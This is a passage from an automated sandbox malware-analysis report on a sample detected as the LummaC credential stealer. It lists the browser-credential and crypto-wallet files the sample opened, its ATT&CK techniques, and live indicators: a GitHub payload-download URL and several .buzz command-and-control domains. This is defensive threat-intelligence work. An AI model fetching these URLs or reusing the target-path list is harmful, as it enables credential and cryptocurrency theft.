                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: Yara matchFile source: 00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		11
                Process Injection                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		331
                Virtualization/Sandbox Evasion                		LSASS Memory321
                Security Software Discovery                		Remote Desktop Protocol31
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Process Injection                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS331
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                Software Packing                		Cached Domain Credentials11
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Timestomp                		DCSync22
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581343 Sample: OiMp3TH.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 27 hummskitnj.buzz 2->27 29 raw.githubusercontent.com 2->29 31 github.com 2->31 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 Antivirus detection for URL or domain 2->43 45 8 other signatures 2->45 8 OiMp3TH.exe 15 5 2->8         started        signatures3 process4 dnsIp5 33 github.com 20.233.83.145, 443, 49704 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->33 35 raw.githubusercontent.com 185.199.108.133, 443, 49705 FASTLYUS Netherlands 8->35 25 C:\...\ghhqoznpon_638708802577261661.exe, PE32 8->25 dropped 47 Adds a directory exclusion to Windows Defender 8->47 13 ghhqoznpon_638708802577261661.exe 8->13         started        17 powershell.exe 23 8->17         started        19 powershell.exe 21 8->19         started        file6 signatures7 process8 dnsIp9 37 hummskitnj.buzz 172.67.216.236, 443, 49706, 49707 CLOUDFLARENETUS United States 13->37 49 Antivirus detection for dropped file 13->49 51 Detected unpacking (changes PE section rights) 13->51 53 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->53 57 7 other signatures 13->57 55 Loading BitLocker PowerShell Module 17->55 21 conhost.exe 17->21         started        23 conhost.exe 19->23         started        signatures10 process11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                OiMp3TH.exe25%VirustotalBrowse
                OiMp3TH.exe18%ReversingLabsByteCode-MSIL.Trojan.Zilla
                OiMp3TH.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\nhrhvnf\ghhqoznpon_638708802577261661.exe100%AviraHEUR/AGEN.1314134
                C:\nhrhvnf\ghhqoznpon_638708802577261661.exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.enigmaprotector.com/openU0%Avira URL Cloudsafe
                https://hummskitnj.buzz/uo0%Avira URL Cloudsafe
                https://hummskitnj.buzz/0%Avira URL Cloudsafe
                https://hummskitnj.buzz/apir0%Avira URL Cloudsafe
                https://hummskitnj.buzz/apiz0%Avira URL Cloudsafe
                https://hummskitnj.buzz/apis0%Avira URL Cloudsafe
                https://hummskitnj.buzz/api100%Avira URL Cloudmalware
                https://hummskitnj.buzz/MN0%Avira URL Cloudsafe
                https://hummskitnj.buzz/apiP;0%Avira URL Cloudsafe
                https://hummskitnj.buzz/l0%Avira URL Cloudsafe
                https://hummskitnj.buzz:443/apil0%Avira URL Cloudsafe
                https://hummskitnj.buzz/pi0%Avira URL Cloudsafe
                https://hummskitnj.buzz/J0%Avira URL Cloudsafe
                https://hummskitnj.buzz/z0%Avira URL Cloudsafe
                https://hummskitnj.buzz/apir$0%Avira URL Cloudsafe
                https://hummskitnj.buzz:443/api100%Avira URL Cloudmalware
                https://hummskitnj.buzz/apiH0%Avira URL Cloudsafe
                https://hummskitnj.buzz:443/apin.txtPK0%Avira URL Cloudsafe
                https://hummskitnj.buzz/d0%Avira URL Cloudsafe
                https://hummskitnj.buzz/X?0%Avira URL Cloudsafe
                http://www.enigmaprotector.com/0%Avira URL Cloudsafe
                https://hummskitnj.buzz/RX0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                github.com
                		20.233.83.145
                		truefalse
                  		high
                  raw.githubusercontent.com
                  		185.199.108.133
                  		truefalse
                    		high
                    hummskitnj.buzz
                    		172.67.216.236
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      scentniej.buzzfalse
                        		high
                        https://hummskitnj.buzz/apitrue
                        • Avira URL Cloud: malware
                        		unknown
                        hummskitnj.buzzfalse
                          		high
                          rebuildeso.buzzfalse
                            		high
                            appliacnesot.buzzfalse
                              		high
                              https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/tpuyikkdktyh.exefalse
                                		high
                                screwamusresz.buzzfalse
                                  		high
                                  cashfuzysao.buzzfalse
                                    		high
                                    inherineau.buzzfalse
                                      		high
                                      prisonyfork.buzzfalse
                                        		high
                                        https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exefalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.microsoftghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336785101.000000000073E000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238159093.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000731000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.comOiMp3TH.exe, 00000000.00000002.4461284237.00000000032C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://hummskitnj.buzz/apiP;ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.000000000075A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266197298.0000000000755000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266565065.000000000075A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYighhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.enigmaprotector.com/openUghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://hummskitnj.buzz/uoghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://hummskitnj.buzz/ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336687721.000000000394F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://hummskitnj.buzz/apisghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000767000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://hummskitnj.buzz/apirghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://hummskitnj.buzz/MNghhqoznpon_638708802577261661.exe, 00000007.00000003.2286970301.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336828454.0000000003950000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262784662.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262559814.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290478382.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336687721.000000000394F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://hummskitnj.buzz/apizghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://github.comOiMp3TH.exe, 00000000.00000002.4461284237.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://hummskitnj.buzz/lghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://hummskitnj.buzz:443/apilghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://x1.c.lencr.org/0ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://x1.i.lencr.org/0ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://hummskitnj.buzz/pighhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303938546.0000000000767000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://hummskitnj.buzz/zghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://hummskitnj.buzz/apir$ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://support.mozilla.org/products/firefoxgro.allghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOiMp3TH.exe, 00000000.00000002.4461284237.0000000003231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://hummskitnj.buzz/Jghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://hummskitnj.buzz/apiHghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000731000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://hummskitnj.buzz/X?ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://raw.githubusercontent.comdOiMp3TH.exe, 00000000.00000002.4461284237.000000000330B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
